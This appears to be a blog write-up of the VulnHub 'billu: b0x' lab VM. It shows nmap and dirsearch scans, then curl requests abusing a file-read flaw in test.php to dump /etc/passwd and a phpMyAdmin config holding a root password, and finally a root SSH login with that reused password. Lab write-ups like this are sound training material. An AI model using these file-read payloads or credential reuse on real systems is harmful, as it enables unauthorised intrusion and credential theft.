billu: b0x
Location
https://download.vulnhub.com/billu/Billu_b0x.zip
Introduction
This is the first Boot2Root from Manish Kishan Tanwar and the official description is not telling much, except that it’s using Ubuntu, PHP, MySQL and Apache. This challenge should have medium difficulty with tricks. The goal is to break into the VM using web application and from there escalate privileges to gain root access.
Getting started
Let’s see what is running on this system.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $sudo nmap -sV -sC -T4 -p- 192.168.56.107 Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-21 15:03 CEST Nmap scan report for 192.168.56.107 Host is up (0.00012s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA) | 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA) |_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: --==[[IndiShell Lab]]==-- MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
When browsing to the webserver I get a login page which invites me to do some SQL injection.
After several manual and automated tries I get no luck with the SQLi invitation. Next step is some enumeration.
┌─[n13mant@planetmars]─[~/Documents/Apps/dirsearch] └──╼ $python3 dirsearch.py -u "http://192.168.56.107" -e php,html -x 403 -r _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php, html | Threads: 10 | Wordlist size: 5542 Error Log: /home/n13mant/Documents/Apps/dirsearch/logs/errors-17-05-10_15-15-54.log Target: http://192.168.56.107 [15:15:54] Starting: [15:15:58] 200 - 307B - /add [15:15:58] 200 - 307B - /add.php [15:16:01] 200 - 1B - /c [15:16:05] 200 - 3KB - /head.php [15:16:05] 301 - 317B - /images -> http://192.168.56.107/images/ [15:16:05] 200 - 47KB - /in [15:16:05] 200 - 3KB - /index [15:16:05] 200 - 3KB - /index.php [15:16:09] 302 - 2KB - /panel.php -> index.php [15:16:10] 200 - 8KB - /phpmy/ [15:16:12] 200 - 1B - /show [15:16:13] 200 - 72B - /test.php [15:16:13] 200 - 72B - /test [15:16:14] Starting: phpmy/ [15:16:16] 200 - 227B - /phpmy/CREDITS [15:16:16] 200 - 28KB - /phpmy/ChangeLog [15:16:16] 200 - 128B - /phpmy/INSTALL [15:16:16] 200 - 2KB - /phpmy/README [15:16:17] 200 - 190B - /phpmy/TODO [15:16:22] 200 - 0B - /phpmy/config.inc.php [15:16:22] 200 - 0B - /phpmy/config.inc [15:16:23] 200 - 3KB - /phpmy/docs [15:16:23] 200 - 18KB - /phpmy/favicon.ico [15:16:23] 200 - 8KB - /phpmy/export [15:16:24] 200 - 8KB - /phpmy/import [15:16:24] 200 - 8KB - /phpmy/import.php [15:16:24] 200 - 8KB - /phpmy/index [15:16:24] 200 - 8KB - /phpmy/index.php [15:16:25] 301 - 319B - /phpmy/js -> http://192.168.56.107/phpmy/js/ [15:16:25] 301 - 326B - /phpmy/libraries -> http://192.168.56.107/phpmy/libraries/ [15:16:26] 200 - 8KB - /phpmy/main.php [15:16:26] 200 - 8KB - /phpmy/main [15:16:27] 200 - 8KB - /phpmy/phpinfo [15:16:27] 200 - 8KB - /phpmy/phpinfo.php [15:16:27] 200 - 41KB - /phpmy/phpmyadmin [15:16:27] 200 - 8KB - /phpmy/phpinfo.php [15:16:28] 200 - 1KB - /phpmy/print [15:16:28] 200 - 26B - /phpmy/robots.txt [15:16:28] 200 - 3KB - /phpmy/scripts/ [15:16:28] 301 - 324B - /phpmy/scripts -> http://192.168.56.107/phpmy/scripts/ [15:16:29] 301 - 322B - /phpmy/setup -> http://192.168.56.107/phpmy/setup/ [15:16:29] 200 - 13KB - /phpmy/setup/ [15:16:30] 200 - 8KB - /phpmy/sql.php [15:16:30] 200 - 8KB - /phpmy/sql.php [15:16:30] 200 - 8KB - /phpmy/sql [15:16:31] 301 - 323B - /phpmy/themes -> http://192.168.56.107/phpmy/themes/ [15:16:32] 200 - 8KB - /phpmy/url [15:16:32] Starting: phpmy/scripts/ [15:16:49] 200 - 5KB - /phpmy/scripts/upgrade [15:16:50] Starting: phpmy/setup/ [15:16:59] 303 - 0B - /phpmy/setup/config [15:16:59] 303 - 0B - /phpmy/setup/config.php [15:16:59] 303 - 0B - /phpmy/setup/config.php [15:17:01] 200 - 13KB - /phpmy/setup/index.php [15:17:01] 200 - 13KB - /phpmy/setup/index [15:17:02] 301 - 326B - /phpmy/setup/lib -> http://192.168.56.107/phpmy/setup/lib/ [15:17:05] 200 - 5KB - /phpmy/setup/scripts [15:17:07] 200 - 7KB - /phpmy/setup/styles Task Completed
Looks like the SQLi invitation was a distraction. Several interesting pages, including a phpMyAdmin page.
First I’ll take a look at add.php. Unfortunately it doens’t really do anything except wasting my time.
Next one on my list is test.php.
It needs a ‘file’ parameter.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $curl -X POST --data "file=/etc/passwd" http://192.168.56.107/test.php root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:103:106::/var/run/dbus:/bin/false whoopsie:x:104:107::/nonexistent:/bin/false landscape:x:105:110::/var/lib/landscape:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
Now for some credentials.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $curl -X POST --data "file=/var/www/phpmy/config.inc.php" http://192.168.56.107/test.php <?php /* Servers configuration */ $i = 0; /* Server: localhost [1] */ $i++; $cfg['Servers'][$i]['verbose'] = 'localhost'; $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['port'] = ''; $cfg['Servers'][$i]['socket'] = ''; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['auth_type'] = 'cookie'; $cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'roottoor'; $cfg['Servers'][$i]['AllowNoPassword'] = true; /* End of servers configuration */ $cfg['DefaultLang'] = 'en-utf-8'; $cfg['ServerDefault'] = 1; $cfg['UploadDir'] = ''; $cfg['SaveDir'] = ''; /* rajk - for blobstreaming */ $cfg['Servers'][$i]['bs_garbage_threshold'] = 50; $cfg['Servers'][$i]['bs_repository_threshold'] = '32M'; $cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600; $cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M'; ?>
Wow….that was almost to easy.
┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh root@192.168.56.107 -p 22
root@192.168.56.107's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed May 24 19:56:10 IST 2017
System load: 0.0 Processes: 75
Usage of /: 11.9% of 9.61GB Users logged in: 0
Memory usage: 8% IP address for eth0: 192.168.56.107
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
root@indishell:~#
Sweet. But I still got some question marks left. What about those odd pages in the DirSearch scan? What about phpMyAdmin?
It feels like I cheated with gaining the root key.
Conclusion
This was a fun challenge with some nice features. The final part was over faster then I had anticipated and I think there are maybe multiple ways to get there. But for now I’m content. Maybe at a later stage I’ll explore other options and update this post.